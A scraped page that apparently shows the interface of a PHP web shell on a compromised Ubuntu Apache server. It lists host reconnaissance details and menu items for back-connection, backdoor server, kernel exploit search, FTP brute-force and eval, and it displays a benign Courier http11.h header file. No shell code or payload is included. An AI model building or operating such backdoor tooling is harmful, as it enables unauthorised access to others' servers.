|
System | : | Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686 |
Software | : | Apache. PHP/5.3.6-13ubuntu3.10 |
ID | : | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
Safe Mode | : | OFF |
Open_Basedir | : | OFF |
Freespace | : | 24.92 GB of 70.42 GB (35.39%) |
|
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON |
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
|
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ]
|
|
/
usr/
src/
courier-0.66.1/
http11/
- drwxrwxrwx
|
Viewing file: http11.h (1.72 KB) -rw-rw-r--Select action/file-type:  ( +) |  ( +) |  ( +) | Code ( +) | Session ( +) |  ( +) | SDB ( +) |  ( +) |  ( +) |  ( +) |  ( +) |  ( +) |
#ifndef http11_h #define http11_h
/* ** Copyright 1998 - 2003 Double Precision, Inc. ** See COPYING for distribution information. */
#if HAVE_CONFIG_H #include "config.h" #endif
#ifdef __cplusplus extern "C" { #endif
#if HAVE_LIBFCGI #include <stdlib.h> #include "fcgi_stdio.h" #endif
/* HTTP 1.1 library */
/* Implement Accept-Language: and Content-Language: headers as follows. ** ** libdir contains one subdirectory for each support content language. ** ** softlinks are used to provide default variations of each content. ** (example: en -> en-us ) ** ** subdirectory/LANGUAGE is a file with one line, containing the name of ** the directory. So, we can open en/LANGUAGE, read en-us, and send that ** back as the Content-Language: ** ** subdirectory/LOCALE is a file with one line - the corresponding locale. ** en-us/LOCALE will contain en_US, for example. ** */
char *http11_best_content_language(const char *libdir, const char *acc_lang); /* acc_lang is our Accept-Language: header. Figure out the best ** content language we can use. ** ** Note - return pointer must be free()d. */
const char *http11_content_language(const char *libdir, const char *cont_lang); /* Return the real content language by reading LANGUAGE */
const char *http11_content_locale(const char *libdir, const char *cont_lang); /* Return the LOCALE */
const char *http11_content_ispelldict(const char *libdir, const char *cont_lang); /* Return the ISPELL dictionary */
const char *http11_content_charset(const char *libdir, const char *acc_lang); /* Return the CHARSET */
FILE *http11_open_langfile(const char *libdir, const char *acc_lang, const char *file); /* Open arbitrary file */
#define HTTP11_DEFAULTLANG "en" #ifdef __cplusplus } #endif #endif
|